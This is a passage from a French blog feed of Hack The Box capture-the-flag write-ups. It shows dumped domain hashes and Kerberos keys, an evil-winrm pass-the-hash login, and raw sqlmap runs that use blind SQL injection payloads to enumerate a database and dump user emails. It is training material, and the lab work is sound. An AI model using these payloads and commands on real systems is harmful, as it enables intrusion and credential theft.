administrator.htb\\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199::: administrator.htb\\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9::: DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664 Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2 Administrator:des-cbc-md5:403286f7cdf18385 krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648 krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94 krbtgt:des-cbc-md5:2c0bc7d0250dbfc7 administrator.htb\\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3 administrator.htb\\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48 administrator.htb\\olivia:des-cbc-md5:bc2a4a7929c198e9 administrator.htb\\michael:aes256-cts-hmac-sha1-96:de3afc157b17c25bf056296233cf23629c06aa2f19d414afbe0afe3da7d59835 administrator.htb\\michael:aes128-cts-hmac-sha1-96:038498213933ca1f3d43b4d7f6b0a572 administrator.htb\\michael:des-cbc-md5:07bf8f89c229c219 administrator.htb\\benjamin:aes256-cts-hmac-sha1-96:c0e6eaa8e841c72e55ef6a938565403e27aa728f5397e75d8cae6cd3423957bd administrator.htb\\benjamin:aes128-cts-hmac-sha1-96:3e8b0ff2f07fd2178ec4d33f1ad0bc4b administrator.htb\\benjamin:des-cbc-md5:4a4aa4e3bc5eab61 administrator.htb\\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4 administrator.htb\\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218 administrator.htb\\emily:des-cbc-md5:804343fb6e0dbc51 administrator.htb\\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f administrator.htb\\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f administrator.htb\\ethan:des-cbc-md5:58387aef9d6754fb administrator.htb\\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6 administrator.htb\\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade administrator.htb\\alexander:des-cbc-md5:49ba9dcb6d07d0bf administrator.htb\\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82 administrator.htb\\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e administrator.htb\\emma:des-cbc-md5:3249fba89813ef5d DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d DC$:des-cbc-md5:f483547c4325492a [*] Cleaning up... Evil-winrm En utilisant le hash de l\u0026rsquo;administrator on peut directement se connecter avec evil-winrm:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $ evil-winrm -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e -i 10.10.11.42 Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\\Users\\Administrator\\Documents\u0026gt; cd ../Desktop *Evil-WinRM* PS C:\\Users\\Administrator\\Desktop\u0026gt; ls Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 11/29/2024 10:54 PM 34 root.txt *Evil-WinRM* PS C:\\Users\\Administrator\\Desktop\u0026gt; cat root.txt 8431.....8a6b Pass The Ticket Attack (PTT) PAS REUSSI, FINALEMENT PAS UTILE ?\n1 2 3 4 5 6 export KRB5CCNAME=Administrator.ccache ## On récupère un ticket getTGT.py ADMINISTRATOR.HTB/Administrator -aesKey 9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Saving ticket in Administrator.ccache ","date":"2024-12-01T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/administrator-htb/","title":"HTB | Administrator"},{"content":" Machine name OS IP Difficulty Usage Linux 10.10.11.18 Easy Enumeration nmap 1 2 3 4 $ nmap 10.10.11.18 -p80,22 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Foothold usage.htb On trouve une site web sur le port 80 de la machine, qui nous redirige vers : usage.htb. On ajoute alors le nom de domaine dans /etc/hosts.\nSQL Injection Sur le site web, on remarque une page de connexion. Il y a une section \u0026ldquo;mot de passe oublié\u0026rdquo;. Lorsqu\u0026rsquo;on s\u0026rsquo;y rend et qu\u0026rsquo;on écrit une email avec un ', on remarque que le serveur affiche un message d\u0026rsquo;erreur. L\u0026rsquo;input semble vulnérable à une possible injection SQL. On utilise donc sqlmap pour vérifier cela :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 sqlmap -r request.txt --data=\u0026#34;_token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh\u0026amp;email=leopold\u0026#34; -p email --batch --level 5 --risk 3 --threads 10 --dbs ___ __H__ ___ ___[\u0026#34;]_____ ___ ___ {1.6.4#stable} |_ -| . [,] | .\u0026#39;| . | |___|_ [,]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0026#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 23:16:02 /2024-08-06/ [23:16:02] [INFO] parsing HTTP request from \u0026#39;request.txt\u0026#39; [23:16:02] [INFO] testing connection to the target URL got a 302 redirect to \u0026#39;http://usage.htb/forget-password\u0026#39;. Do you want to follow? [Y/n] Y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y [23:16:05] [INFO] testing if the target URL content is stable you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y [23:16:08] [WARNING] heuristic (basic) test shows that POST parameter \u0026#39;email\u0026#39; might not be injectable [23:16:10] [INFO] testing for SQL injection on POST parameter \u0026#39;email\u0026#39; [23:16:10] [INFO] testing \u0026#39;AND boolean-based blind - WHERE or HAVING clause\u0026#39; [23:16:55] [INFO] testing \u0026#39;OR boolean-based blind - WHERE or HAVING clause\u0026#39; [23:17:09] [INFO] testing \u0026#39;OR boolean-based blind - WHERE or HAVING clause (NOT)\u0026#39; [23:17:25] [INFO] testing \u0026#39;AND boolean-based blind - WHERE or HAVING clause (subquery - comment)\u0026#39; [23:17:25] [INFO] POST parameter \u0026#39;email\u0026#39; appears to be \u0026#39;AND boolean-based blind - WHERE or HAVING clause (subquery - comment)\u0026#39; injectable [23:17:28] [INFO] heuristic (extended) test shows that the back-end DBMS could be \u0026#39;MySQL\u0026#39; it looks like the back-end DBMS is \u0026#39;MySQL\u0026#39;. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y [23:17:28] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)\u0026#39; [23:17:28] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)\u0026#39; [23:17:29] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)\u0026#39; [23:17:29] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.5 OR error-based - WHERE or HAVING clause (EXP)\u0026#39; [23:17:29] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)\u0026#39; [23:17:29] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)\u0026#39; [23:17:29] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)\u0026#39; [23:17:29] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)\u0026#39; [23:17:30] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\u0026#39; [23:17:30] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\u0026#39; [23:17:30] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)\u0026#39; [23:17:30] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)\u0026#39; [23:17:30] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)\u0026#39; [23:17:30] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)\u0026#39; [23:17:30] [INFO] testing \u0026#39;MySQL \u0026gt;= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\u0026#39; [23:17:31] [INFO] testing \u0026#39;MySQL \u0026gt;= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)\u0026#39; [23:17:31] [INFO] testing \u0026#39;MySQL OR error-based - WHERE or HAVING clause (FLOOR)\u0026#39; [23:17:31] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)\u0026#39; [23:17:31] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)\u0026#39; [23:17:31] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.5 error-based - Parameter replace (EXP)\u0026#39; [23:17:31] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.6 error-based - Parameter replace (GTID_SUBSET)\u0026#39; [23:17:31] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.7.8 error-based - Parameter replace (JSON_KEYS)\u0026#39; [23:17:31] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.0 error-based - Parameter replace (FLOOR)\u0026#39; [23:17:31] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.1 error-based - Parameter replace (UPDATEXML)\u0026#39; [23:17:31] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.1 error-based - Parameter replace (EXTRACTVALUE)\u0026#39; [23:17:31] [INFO] testing \u0026#39;Generic inline queries\u0026#39; [23:17:31] [INFO] testing \u0026#39;MySQL inline queries\u0026#39; [23:17:31] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.0.12 stacked queries (comment)\u0026#39; [23:17:31] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.0.12 stacked queries\u0026#39; [23:17:32] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.0.12 stacked queries (query SLEEP - comment)\u0026#39; [23:17:32] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.0.12 stacked queries (query SLEEP)\u0026#39; [23:17:32] [INFO] testing \u0026#39;MySQL \u0026lt; 5.0.12 stacked queries (BENCHMARK - comment)\u0026#39; [23:17:32] [INFO] testing \u0026#39;MySQL \u0026lt; 5.0.12 stacked queries (BENCHMARK)\u0026#39; [23:17:32] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.0.12 AND time-based blind (query SLEEP)\u0026#39; [23:17:32] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.0.12 OR time-based blind (query SLEEP)\u0026#39; [23:17:33] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.0.12 AND time-based blind (SLEEP)\u0026#39; [23:17:33] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.0.12 OR time-based blind (SLEEP)\u0026#39; [23:17:33] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.0.12 AND time-based blind (SLEEP - comment)\u0026#39; [23:17:33] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.0.12 OR time-based blind (SLEEP - comment)\u0026#39; [23:17:33] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.0.12 AND time-based blind (query SLEEP - comment)\u0026#39; [23:17:33] [INFO] testing \u0026#39;MySQL \u0026gt;= 5.0.12 OR time-based blind (query SLEEP - comment)\u0026#39; [23:17:34] [INFO] testing \u0026#39;MySQL \u0026lt; 5.0.12 AND time-based blind (BENCHMARK)\u0026#39; [23:17:34] [INFO] testing \u0026#39;MySQL \u0026gt; 5.0.12 AND time-based blind (heavy query)\u0026#39; [23:18:34] [INFO] POST parameter \u0026#39;email\u0026#39; appears to be \u0026#39;MySQL \u0026gt; 5.0.12 AND time-based blind (heavy query)\u0026#39; injectable [23:18:34] [INFO] testing \u0026#39;Generic UNION query (NULL) - 1 to 20 columns\u0026#39; [23:18:34] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [23:18:39] [INFO] \u0026#39;ORDER BY\u0026#39; technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [23:18:42] [INFO] target URL appears to have 8 columns in query do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N injection not exploitable with NULL values. Do you want to try with a random integer value for option \u0026#39;--union-char\u0026#39;? [Y/n] Y [23:19:49] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. \u0026#39;--dbms=mysql\u0026#39;) [23:20:09] [INFO] target URL appears to be UNION injectable with 8 columns injection not exploitable with NULL values. Do you want to try with a random integer value for option \u0026#39;--union-char\u0026#39;? [Y/n] Y [23:21:28] [INFO] testing \u0026#39;Generic UNION query (53) - 21 to 40 columns\u0026#39; [23:21:50] [INFO] testing \u0026#39;Generic UNION query (53) - 41 to 60 columns\u0026#39; [23:22:08] [INFO] testing \u0026#39;Generic UNION query (53) - 61 to 80 columns\u0026#39; [23:22:31] [INFO] testing \u0026#39;Generic UNION query (53) - 81 to 100 columns\u0026#39; [23:22:53] [INFO] testing \u0026#39;MySQL UNION query (53) - 1 to 20 columns\u0026#39; [23:23:41] [INFO] testing \u0026#39;MySQL UNION query (53) - 21 to 40 columns\u0026#39; [23:24:07] [INFO] testing \u0026#39;MySQL UNION query (53) - 41 to 60 columns\u0026#39; [23:24:24] [INFO] testing \u0026#39;MySQL UNION query (53) - 61 to 80 columns\u0026#39; [23:24:45] [INFO] testing \u0026#39;MySQL UNION query (53) - 81 to 100 columns\u0026#39; [23:25:14] [INFO] checking if the injection point on POST parameter \u0026#39;email\u0026#39; is a false positive POST parameter \u0026#39;email\u0026#39; is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 735 HTTP(s) requests: --- Parameter: email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh\u0026amp;email=leopold\u0026#39; AND 5458=(SELECT (CASE WHEN (5458=5458) THEN 5458 ELSE (SELECT 4624 UNION SELECT 6593) END))-- UEue Type: time-based blind Title: MySQL \u0026gt; 5.0.12 AND time-based blind (heavy query) Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh\u0026amp;email=leopold\u0026#39; AND 1208=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)-- zgvX --- [23:25:34] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.18.0 back-end DBMS: MySQL \u0026gt; 5.0.12 [23:25:41] [INFO] fetching database names [23:25:41] [INFO] fetching number of databases [23:25:41] [INFO] retrieved: 3 [23:25:47] [INFO] retrieving the length of query output [23:25:47] [INFO] retrieved: 18 [23:26:30] [INFO] retrieved: information_schema [23:26:30] [INFO] retrieving the length of query output [23:26:30] [INFO] retrieved: 18 [23:27:10] [INFO] retrieved: performance_schema [23:27:10] [INFO] retrieving the length of query output [23:27:10] [INFO] retrieved: 10 [23:27:36] [INFO] retrieved: usage_blog available databases [3]: [*] information_schema [*] performance_schema [*] usage_blog [23:27:36] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 511 times [23:27:36] [INFO] fetched data logged to text files under \u0026#39;/home/leopold/.local/share/sqlmap/output/usage.htb\u0026#39; [23:27:36] [WARNING] your sqlmap version is outdated [*] ending @ 23:27:36 /2024-08-06/ Il est bien vulnérable ! On trouve une base de donnée mysql : usage_blog\nMySQL - usage_blog A l\u0026rsquo;aide de plusieurs requête, on trouve un table users dans la base de données usage_blog. Dans cette bdd, on trouve les champs:\nemail password 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 $ sqlmap -r request.txt --data=\u0026#34;_token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh\u0026amp;email=leopold\u0026#34; -p email --batch --level 5 --risk 3 --threads 10 -D usage_blog -T users --columns ___ __H__ ___ ___[.]_____ ___ ___ {1.6.4#stable} |_ -| . [,] | .\u0026#39;| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0026#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 23:30:20 /2024-08-06/ [23:30:20] [INFO] parsing HTTP request from \u0026#39;request.txt\u0026#39; [23:30:21] [INFO] resuming back-end DBMS \u0026#39;mysql\u0026#39; [23:30:21] [INFO] testing connection to the target URL got a 302 redirect to \u0026#39;http://usage.htb/forget-password\u0026#39;. Do you want to follow? [Y/n] Y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y sqlmap resumed the following injection point(s) from stored session: --- Parameter: email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh\u0026amp;email=leopold\u0026#39; AND 5458=(SELECT (CASE WHEN (5458=5458) THEN 5458 ELSE (SELECT 4624 UNION SELECT 6593) END))-- UEue Type: time-based blind Title: MySQL \u0026gt; 5.0.12 AND time-based blind (heavy query) Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh\u0026amp;email=leopold\u0026#39; AND 1208=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)-- zgvX --- [23:30:23] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.18.0 back-end DBMS: MySQL \u0026gt; 5.0.12 [23:30:23] [INFO] fetching columns for table \u0026#39;users\u0026#39; in database \u0026#39;usage_blog\u0026#39; [23:30:23] [INFO] retrieved: you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y 8 [23:30:32] [INFO] retrieving the length of query output [23:30:32] [INFO] retrieved: 10 [23:31:00] [INFO] retrieved: created_at [23:31:00] [INFO] retrieving the length of query output [23:31:00] [INFO] retrieved: 9 [23:31:16] [INFO] retrieved: timestamp [23:31:16] [INFO] retrieving the length of query output [23:31:16] [INFO] retrieved: 5 [23:31:34] [INFO] retrieved: email \u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt; [23:31:34] [INFO] retrieving the length of query output [23:31:34] [INFO] retrieved: 12 [23:32:10] [INFO] retrieved: varchar(255) [23:32:10] [INFO] retrieving the length of query output [23:32:10] [INFO] retrieved: 17 [23:32:54] [INFO] retrieved: email_verified_at [23:32:54] [INFO] retrieving the length of query output [23:32:54] [INFO] retrieved: 9 [23:33:21] [INFO] retrieved: timestamp [23:33:21] [INFO] retrieving the length of query output [23:33:21] [INFO] retrieved: 2 [23:33:42] [INFO] retrieved: id [23:33:42] [INFO] retrieving the length of query output [23:33:42] [INFO] retrieved: 15 [23:34:15] [INFO] retrieved: bigint unsigned [23:34:16] [INFO] retrieving the length of query output [23:34:15] [INFO] retrieved: 4 [23:34:38] [INFO] retrieved: name [23:34:38] [INFO] retrieving the length of query output [23:34:38] [INFO] retrieved: 12 [23:35:37] [INFO] retrieved: varchar(255) [23:35:37] [INFO] retrieving the length of query output [23:35:37] [INFO] retrieved: 8 [23:36:10] [INFO] retrieved: password \u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt; [23:36:10] [INFO] retrieving the length of query output [23:36:10] [INFO] retrieved: 12 [23:37:11] [INFO] retrieved: varchar(255) [23:37:11] [INFO] retrieving the length of query output [23:37:11] [INFO] retrieved: 14 [23:37:20] [INFO] retrieved: ______________ [23:38:06] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [23:38:06] [WARNING] if the problem persists please try to lower the number of used threads (option \u0026#39;--threads\u0026#39;) [23:38:06] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [23:38:06] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [23:38:06] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [23:38:06] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [23:38:06] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [23:38:06] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [23:38:06] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [23:38:06] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [23:38:06] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) there seems to be a continuous problem with connection to the target. Are you sure that you want to continue? [y/N] N multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N [23:39:07] [INFO] retrieved: [23:39:07] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [23:39:07] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option \u0026#39;--time-sec\u0026#39; as possible (e.g. 10 or more) [23:39:37] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 477 times [23:39:37] [INFO] fetched data logged to text files under \u0026#39;/home/leopold/.local/share/sqlmap/output/usage.htb\u0026#39; [23:39:37] [WARNING] your sqlmap version is outdated [*] ending @ 23:39:37 /2024-08-06/ 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 $ sqlmap -r request.txt --data=\u0026#34;_token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh\u0026amp;email=leopold\u0026#34; -p email --batch --level 5 --risk 3 --threads 10 -D usage_blog -T users -C email --dump ___ __H__ ___ ___[\u0026#39;]_____ ___ ___ {1.6.4#stable} |_ -| . [(] | .\u0026#39;| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0026#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 23:34:07 /2024-08-06/ [23:34:07] [INFO] parsing HTTP request from \u0026#39;request.txt\u0026#39; [23:34:07] [INFO] resuming back-end DBMS \u0026#39;mysql\u0026#39; [23:34:07] [INFO] testing connection to the target URL got a 302 redirect to \u0026#39;http://usage.htb/forget-password\u0026#39;. Do you want to follow? [Y/n] Y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y sqlmap resumed the following injection point(s) from stored session: --- Parameter: email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh\u0026amp;email=leopold\u0026#39; AND 5458=(SELECT (CASE WHEN (5458=5458) THEN 5458 ELSE (SELECT 4624 UNION SELECT 6593) END))-- UEue Type: time-based blind Title: MySQL \u0026gt; 5.0.12 AND time-based blind (heavy query) Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh\u0026amp;email=leopold\u0026#39; AND 1208=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)-- zgvX --- [23:34:10] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.18.0 back-end DBMS: MySQL \u0026gt; 5.0.12 [23:34:10] [INFO] fetching entries of column(s) \u0026#39;email\u0026#39; for table \u0026#39;users\u0026#39; in database \u0026#39;usage_blog\u0026#39; [23:34:10] [INFO] fetching number of column(s) \u0026#39;email\u0026#39; entries for table \u0026#39;users\u0026#39; in database \u0026#39;usage_blog\u0026#39; [23:34:10] [INFO] retrieved: you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y 5 [23:34:19] [INFO] retrieving the length of query output [23:34:19] [INFO] retrieved: 23 [23:35:24] [INFO] retrieved: brm@brunorochamoura.com [23:35:24] [INFO] retrieving the length of query output [23:35:24] [INFO] retrieved: 15 [23:36:21] [INFO] retrieved: davy@wavy.gravy [23:36:21] [INFO] retrieving the length of query output [23:36:21] [INFO] retrieved: 11 [23:37:09] [INFO] retrieved: raj@raj.com [23:37:09] [INFO] retrieving the length of query output [23:37:09] [INFO] retrieved: 13 [23:37:20] [INFO] retrieved: _____________ 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 $ sqlmap -r request.txt --data=\u0026#34;_token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh\u0026amp;email=leopold\u0026#34; -p email --batch --level 5 --risk 3 --threads 10 -D usage_blog -T users -C password --dump ___ __H__ ___ ___[.]_____ ___ ___ {1.6.4#stable} |_ -| . [(] | .\u0026#39;| . | |___|_ [\u0026#39;]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0026#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 23:34:22 /2024-08-06/ [23:34:22] [INFO] parsing HTTP request from \u0026#39;request.txt\u0026#39; [23:34:22] [INFO] resuming back-end DBMS \u0026#39;mysql\u0026#39; [23:34:22] [INFO] testing connection to the target URL got a 302 redirect to \u0026#39;http://usage.htb/forget-password\u0026#39;. Do you want to follow? [Y/n] Y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y sqlmap resumed the following injection point(s) from stored session: --- Parameter: email (POST) Type: boolean-based blind Title: AND boolean-based 